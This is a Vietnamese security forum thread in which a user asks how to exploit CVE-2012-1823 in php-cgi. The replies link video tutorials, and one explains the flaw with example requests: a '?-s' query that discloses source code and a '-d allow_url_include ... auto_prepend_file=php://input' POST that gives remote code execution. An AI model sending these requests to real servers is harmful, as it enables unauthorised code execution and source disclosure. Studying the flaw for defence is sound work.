CVE-2012-1823 xin các pro hưỡng dẫn khai thác ??

  • Bắt đầu script
  • Ngày bắt đầu
S

script

Guest
CVE-2012-1823 xin các pro hưỡng dẫn khai thác ??
các pro có thể giúp em khai thác chi tiết lỗi này đc không ạ! em xem các tut trên mang nhưng không hiểu nổi vì họ làm tắt các bước
em cảm ơn trước
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: CVE-2012-1823 xin các pro hưỡng dẫn khai thác ??

Bạn tham khảo những clip sau nha:
[video=youtube;0bNo3u85C1s]https://www.youtube.com/watch?v=0bNo3u85C1s[/video] [video=youtube;ZcUsR9DSSOk]https://www.youtube.com/watch?v=ZcUsR9DSSOk[/video] [video=youtube;nxwqmE1TGB8]https://www.youtube.com/watch?v=nxwqmE1TGB8[/video]​
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: CVE-2012-1823 xin các pro hưỡng dẫn khai thác ??

whf;27209 đã viết:
Bạn tham khảo các clip sau cho dễ hình dung nhé!


script;27207 đã viết:
các pro có thể giúp em khai thác chi tiết lỗi này đc không ạ! em xem các tut trên mang nhưng không hiểu nổi vì họ làm tắt các bước
em cảm ơn trước
Bạn xem có gì không hiểu Whf sẽ hỗ trợ nhé.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: CVE-2012-1823 xin các pro hưỡng dẫn khai thác ??

CVE-2012-1823 là một lỗi khá thú vị, được phát hiện bởi nhóm CTF Eindbazen trong lúc chơi ở giải Nullcon Hackim 2012. Máy chủ của hệ thống thi dính lỗi này.

Nguyên nhân lỗi là do file binary php-cgi không lọc các giá trị tham số khi truyền vào dẫn đến người dùng có thể truyền một tham số bất kỳ đến php-cgi thông qua HTTP Request

Chẳng hạn để disclosure source code thì thử request

Mã:
[I][URL]http://domain/?-s[/URL][/I]
Lỗi này còn cho phép thực hiện Remote Code Execution bằng request

Mã:
POST: [I][URL]http://domain/?-d[/URL] allow_url_include=1 -d auto_prepend_file=php://input[/I]
Data: [I][/I]
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên